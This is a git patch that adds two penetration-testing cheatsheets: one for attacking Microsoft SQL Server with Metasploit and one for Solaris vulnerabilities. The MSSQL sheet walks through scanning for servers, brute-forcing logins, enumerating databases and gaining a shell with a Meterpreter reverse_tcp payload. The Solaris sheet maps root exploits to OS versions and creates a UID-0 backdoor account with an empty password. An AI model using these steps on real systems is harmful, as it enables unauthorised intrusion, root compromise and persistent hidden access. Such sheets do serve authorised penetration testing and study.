From 94848eb0f04bb8e1855e2b5481620df40fba2010 Mon Sep 17 00:00:00 2001 From: JShaw Date: Thu, 11 Sep 2014 21:42:33 +0100 Subject: [PATCH] Added AttackingMSSQL and Solaris Cheatsheets Added AttackingMSSQL and Solaris Cheatsheets --- Cheatsheet_AttackingMSSQL.txt | 21 +++++++++++++++++++ Cheatsheet_Solaris.txt | 38 +++++++++++++++++++++++++++++++++++ 2 files changed, 59 insertions(+) create mode 100644 Cheatsheet_AttackingMSSQL.txt create mode 100644 Cheatsheet_Solaris.txt diff --git a/Cheatsheet_AttackingMSSQL.txt b/Cheatsheet_AttackingMSSQL.txt new file mode 100644 index 0000000..ce91b46 --- /dev/null +++ b/Cheatsheet_AttackingMSSQL.txt @@ -0,0 +1,21 @@ +[+] Attacking MSSQL with Metasploit + +[>] Enumerate MSSQL Servers on the network: + +msf > use auxiliary/scanner/mssql/mssql_ping +nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 +Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio. + +[>] Bruteforce MSSQL Database: + +msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login + +[>] Enumerate MSSQL Database: + +msf > use auxiliary/admin/mssql/mssql_enum + +[>] Gain shell using gathered credentials + +msf > use exploit/windows/mssql/mssql_payload +msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp + diff --git a/Cheatsheet_Solaris.txt b/Cheatsheet_Solaris.txt new file mode 100644 index 0000000..c5b9dfb --- /dev/null +++ b/Cheatsheet_Solaris.txt @@ -0,0 +1,38 @@ +[+] Solaris vulnerabilities: + +Solaris 7: +sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl +**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client +sendmail_exec LPD - line printer daemon buffer overflow - allows root +heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root +ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root +kcms_readfile kcms / ttdbserverd remote file read (only in msf2) + +Solaris 8: +sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl +**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client +sendmail_exec LPD - line printer daemon buffer overflow - allows root +heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root +ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. +no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. +kcms_readfile kcms / ttdbserverd remote file read (only in msf2) + +solaris 9: +sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl +ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. +sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. +kcms_readfile kcms / ttdbserverd remote file read (only in msf2) + +Solaris 10: +fuser TELNET - authentication bypass through -f command - can be manually exploited +ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. + +Solaris 11: +fuser TELNET - authentication bypass through -f command - can be manually exploited + +[+] Adding solaris user: + +useradd -u 0 -o pentestuser +passwd -d pentestuser + +[+] In addition, familiarise yourself with rpcinfo, nfsshell, showmount, 'mount -t nfs'. \ No newline at end of file